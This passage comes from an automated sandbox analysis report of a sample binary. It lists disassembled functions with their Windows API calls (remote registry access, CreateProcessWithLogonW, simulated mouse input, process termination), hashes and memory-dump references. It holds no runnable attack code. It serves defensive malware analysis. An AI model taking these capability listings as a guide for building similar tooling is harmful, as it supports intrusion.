                                                              • Part of subcall function 00CF3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00CF9F72
                                                              • Part of subcall function 00CF3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00CF9F85
                                                              • Part of subcall function 00CF3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00CF9F98
                                                              • Part of subcall function 00CF3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00CF9FAB
                                                              • Part of subcall function 00CF3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00CF9FBE
                                                            • __mtinitlocks.LIBCMT ref: 00CF9AEB
                                                            • __mtterm.LIBCMT ref: 00CF9AF4
                                                              • Part of subcall function 00CF9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00CF9AF9,00CF7CD0,00D8A0B8,00000014), ref: 00CF9C56
                                                              • Part of subcall function 00CF9B5C: _free.LIBCMT ref: 00CF9C5D
                                                              • Part of subcall function 00CF9B5C: DeleteCriticalSection.KERNEL32(00D8EC00,?,?,00CF9AF9,00CF7CD0,00D8A0B8,00000014), ref: 00CF9C7F
                                                            • __calloc_crt.LIBCMT ref: 00CF9B19
                                                            • __initptd.LIBCMT ref: 00CF9B3B
                                                            • GetCurrentThreadId.KERNEL32 ref: 00CF9B42
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                            • String ID:
                                                            • API String ID: 3567560977-0
                                                            • Opcode ID: e7125208b90b6dd9cc87aff9ef0520df5112bd3ce5c042012e1c57a196bd06a9
                                                            • Instruction ID: f40616249d5e33cde2b963a4e07212e5959aa8496dfd5a6f5d499ae67ec78506
                                                            • Opcode Fuzzy Hash: e7125208b90b6dd9cc87aff9ef0520df5112bd3ce5c042012e1c57a196bd06a9
                                                            • Instruction Fuzzy Hash: 8DF0CD325197192AEEF47774BC07BBA2780DB02334F200A2AF720C61D6EF70850026A2
                                                            Function 00CF406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00CF3F85), ref: 00CF4085
                                                            • GetProcAddress.KERNEL32(00000000), ref: 00CF408C
                                                            • EncodePointer.KERNEL32(00000000), ref: 00CF4097
                                                            • DecodePointer.KERNEL32(00CF3F85), ref: 00CF40B2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                            • String ID: RoUninitialize$combase.dll
                                                            • API String ID: 3489934621-2819208100
                                                            • Opcode ID: 5c19429edd79377af54f08e7f1854702e85ff1f294bb839e7b7c69a57c116c01
                                                            • Instruction ID: c0cfe99588e219111daee0425f65c00cf955fce3b465d68231775c4a0ef04205
                                                            • Opcode Fuzzy Hash: 5c19429edd79377af54f08e7f1854702e85ff1f294bb839e7b7c69a57c116c01
                                                            • Instruction Fuzzy Hash: 34E0B670581700EFEB64AF61EC0DB163AA4B704783F104026FA55E92B0CFB64604CF79
                                                            Function 00D364B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _memmove$__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 3253778849-0
                                                            • Opcode ID: 448254e0949c07d16a0f673e8df4957746ed55f0cae072f6d9ea880876eb2e4a
                                                            • Instruction ID: 825355247edb79694e64df78818cf2985efde9d178ead6b1aab7709198d468a4
                                                            • Opcode Fuzzy Hash: 448254e0949c07d16a0f673e8df4957746ed55f0cae072f6d9ea880876eb2e4a
                                                            • Instruction Fuzzy Hash: FC61AE3590025AABCF01EF60CC82EFE37A5EF05708F048569FA595B292DB34EC05EB61
                                                            Function 00D501E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CD7DE1: _memmove.LIBCMT ref: 00CD7E22
                                                              • Part of subcall function 00D50E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00D4FDAD,?,?), ref: 00D50E31
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00D502BD
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00D502FD
                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00D50320
                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00D50349
                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00D5038C
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00D50399
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                            • String ID:
                                                            • API String ID: 4046560759-0
                                                            • Opcode ID: 2d57aa3c1abe46341f98a93fa9fb4de469c2d82e75414563d4e337f371f222b2
                                                            • Instruction ID: 0b85ddcfff3e6eb7a1212089cf49940048fea8061226c34deb5cc3c4c22d2c56
                                                            • Opcode Fuzzy Hash: 2d57aa3c1abe46341f98a93fa9fb4de469c2d82e75414563d4e337f371f222b2
                                                            • Instruction Fuzzy Hash: FF514A31108304AFDB14EF64C885E6EBBE9FF84315F04491DF9958B2A2DB31E909DB62
                                                            Function 00D55799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetMenu.USER32(?), ref: 00D557FB
                                                            • GetMenuItemCount.USER32(00000000), ref: 00D55832
                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00D5585A
                                                            • GetMenuItemID.USER32(?,?), ref: 00D558C9
                                                            • GetSubMenu.USER32(?,?), ref: 00D558D7
                                                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 00D55928
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$CountMessagePostString
                                                            • String ID:
                                                            • API String ID: 650687236-0
                                                            • Opcode ID: d2851a83c4fc52e5ae4abdf6685acd2f474be624aef5bfaca6bf66eb40873d66
                                                            • Instruction ID: b8e3ed268b0b3948dac547b5df508ddab2f39bc6ca30bcb44f8a2c48ebefea56
                                                            • Opcode Fuzzy Hash: d2851a83c4fc52e5ae4abdf6685acd2f474be624aef5bfaca6bf66eb40873d66
                                                            • Instruction Fuzzy Hash: A1518C35E00615EFCF01EFA4D855AAEBBB4EF48721F144069ED42BB351CB34AE419BA0
                                                            Function 00D2EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 00D2EF06
                                                            • VariantClear.OLEAUT32(00000013), ref: 00D2EF78
                                                            • VariantClear.OLEAUT32(00000000), ref: 00D2EFD3
                                                            • _memmove.LIBCMT ref: 00D2EFFD
                                                            • VariantClear.OLEAUT32(?), ref: 00D2F04A
                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00D2F078
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Variant$Clear$ChangeInitType_memmove
                                                            • String ID:
                                                            • API String ID: 1101466143-0
                                                            • Opcode ID: bee6981132add03d26ea99f0cad94865db3d3ba1adc096063a31a76fc53661db
                                                            • Instruction ID: 3e1e556e8b60d11bc11dcca9b6ae3569a3a4f8ccab25e3fc3f5e01622f6f4992
                                                            • Opcode Fuzzy Hash: bee6981132add03d26ea99f0cad94865db3d3ba1adc096063a31a76fc53661db
                                                            • Instruction Fuzzy Hash: 885166B5A00219EFCB14DF58D884AAAB7B8FF4C314B15856AED59DB301E334E911CFA0
                                                            Function 00D3220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 00D32258
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D322A3
                                                            • IsMenu.USER32(00000000), ref: 00D322C3
                                                            • CreatePopupMenu.USER32 ref: 00D322F7
                                                            • GetMenuItemCount.USER32(000000FF), ref: 00D32355
                                                            • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00D32386
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                            • String ID:
                                                            • API String ID: 3311875123-0
                                                            • Opcode ID: 88346eba549573991a8bfd30e48341a1a31da6faad92a4b4d3688fc99acaf65c
                                                            • Instruction ID: a4da48808277ca495bdedf7e39f51513a5eb4b03593336d125f06e74bc9fa7dc
                                                            • Opcode Fuzzy Hash: 88346eba549573991a8bfd30e48341a1a31da6faad92a4b4d3688fc99acaf65c
                                                            • Instruction Fuzzy Hash: EC517970A01309DBDF21DF68D888BBEBBE5EF45314F18412DE851AB290D3759A44CB71
                                                            Function 00CD1765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CD2612: GetWindowLongW.USER32(?,000000EB), ref: 00CD2623
                                                            • BeginPaint.USER32(?,?,?,?,?,?), ref: 00CD179A
                                                            • GetWindowRect.USER32(?,?), ref: 00CD17FE
                                                            • ScreenToClient.USER32(?,?), ref: 00CD181B
                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00CD182C
                                                            • EndPaint.USER32(?,?), ref: 00CD1876
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                            • String ID:
                                                            • API String ID: 1827037458-0
                                                            • Opcode ID: 4af0bd772e8cbdec1411cde6c2653434762ec58cc9394c5d45f58b6f91149072
                                                            • Instruction ID: 07685eade1bff500393c69b69e51c71a678b25396c73df6d278e5e71e39c512f
                                                            • Opcode Fuzzy Hash: 4af0bd772e8cbdec1411cde6c2653434762ec58cc9394c5d45f58b6f91149072
                                                            • Instruction Fuzzy Hash: A6418C30504700AFDB11DF25DC84BAA7BE8EB45724F08462AFAA4CB3F1C7309845EB61
                                                            Function 00D4709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetForegroundWindow.USER32(?,?,?,?,?,?,00D44E41,?,?,00000000,00000001), ref: 00D470AC
                                                              • Part of subcall function 00D439A0: GetWindowRect.USER32(?,?), ref: 00D439B3
                                                            • GetDesktopWindow.USER32 ref: 00D470D6
                                                            • GetWindowRect.USER32(00000000), ref: 00D470DD
                                                            • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00D4710F
                                                              • Part of subcall function 00D35244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00D352BC
                                                            • GetCursorPos.USER32(?), ref: 00D4713B
                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00D47199
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                            • String ID:
                                                            • API String ID: 4137160315-0
                                                            • Opcode ID: a5983a70650c1aef35a8103186876f9a5371f362f01ef04ef99fe8989397d0cd
                                                            • Instruction ID: f3d556a35907b79f84ab06724cd52a279308b60a6cbd8ae7f917e147d95f643b
                                                            • Opcode Fuzzy Hash: a5983a70650c1aef35a8103186876f9a5371f362f01ef04ef99fe8989397d0cd
                                                            • Instruction Fuzzy Hash: 3B31C472509305ABD720DF14D849F9BB7E9FF88314F040929F985E7291D770EA09CBA2
                                                            Function 00D28879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00D280A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00D280C0
                                                              • Part of subcall function 00D280A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00D280CA
                                                              • Part of subcall function 00D280A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00D280D9
                                                              • Part of subcall function 00D280A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00D280E0
                                                              • Part of subcall function 00D280A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00D280F6
                                                            • GetLengthSid.ADVAPI32(?,00000000,00D2842F), ref: 00D288CA
                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00D288D6
                                                            • HeapAlloc.KERNEL32(00000000), ref: 00D288DD
                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 00D288F6
                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00D2842F), ref: 00D2890A
                                                            • HeapFree.KERNEL32(00000000), ref: 00D28911
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                            • String ID:
                                                            • API String ID: 3008561057-0
                                                            • Opcode ID: 5af7b4eaf1f84c05363ffa31d676685610e9a37a40403a30aa29ce6489d26c15
                                                            • Instruction ID: 4cc275bfa7da46128e7b0c59f25caa65cc2105a9656638427cb6f870663f3890
                                                            • Opcode Fuzzy Hash: 5af7b4eaf1f84c05363ffa31d676685610e9a37a40403a30aa29ce6489d26c15
                                                            • Instruction Fuzzy Hash: 6D11AF35502719FFDB109FA4EC09FBE77A8EB5431AF188029E885D7210CB329940EB70
                                                            Function 00D285B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00D285E2
                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00D285E9
                                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00D285F8
                                                            • CloseHandle.KERNEL32(00000004), ref: 00D28603
                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00D28632
                                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 00D28646
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                            • String ID:
                                                            • API String ID: 1413079979-0
                                                            • Opcode ID: 5902b5af569b87c6b4fd07cc9dba8a76db29c27d5aa49ba11607ab3c636805bf
                                                            • Instruction ID: 14f86688def747ebc3ce04fb6e30d70acd4b11557a8e41513a01f323fab390bd
                                                            • Opcode Fuzzy Hash: 5902b5af569b87c6b4fd07cc9dba8a76db29c27d5aa49ba11607ab3c636805bf
                                                            • Instruction Fuzzy Hash: F5115C72501249ABDF118FA4ED49BDE7BA9EF48349F084064FE04E6260C7729D61EB70
                                                            Function 00D2B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 00D2B7B5
                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 00D2B7C6
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D2B7CD
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00D2B7D5
                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00D2B7EC
                                                            • MulDiv.KERNEL32(000009EC,?,?), ref: 00D2B7FE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: CapsDevice$Release
                                                            • String ID:
                                                            • API String ID: 1035833867-0
                                                            • Opcode ID: 74db89f9a39afed4f2f87e4d8a5a0c78e9feab393307481da32473f3546e3a7f
                                                            • Instruction ID: c7c17aee9a0c4d8ebda9fc76d9e8df945bc1960358d383bfdf9f2e7b97c3aff3
                                                            • Opcode Fuzzy Hash: 74db89f9a39afed4f2f87e4d8a5a0c78e9feab393307481da32473f3546e3a7f
                                                            • Instruction Fuzzy Hash: A6012175E00319BBEB109BA69D45A5ABFB8EB58761F044066FE04EB391D6709C10CFA1
                                                            Function 00CF0162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00CF0193
                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00CF019B
                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00CF01A6
                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00CF01B1
                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00CF01B9
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00CF01C1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Virtual
                                                            • String ID:
                                                            • API String ID: 4278518827-0
                                                            • Opcode ID: 633b5b28dec2d57ca2e54986dcd5ef65786e250cfa982229e7c438250b37ed86
                                                            • Instruction ID: 92826dc42c23c4409aa97bad650636b063181fe76b17a7447b388c12bba5faa5
                                                            • Opcode Fuzzy Hash: 633b5b28dec2d57ca2e54986dcd5ef65786e250cfa982229e7c438250b37ed86
                                                            • Instruction Fuzzy Hash: F5016CB09017597DE3009F5A8C85B52FFE8FF19354F00411BA15C8BA41C7F5A864CBE5
                                                            Function 00D353E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00D353F9
                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00D3540F
                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 00D3541E
                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00D3542D
                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00D35437
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00D3543E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
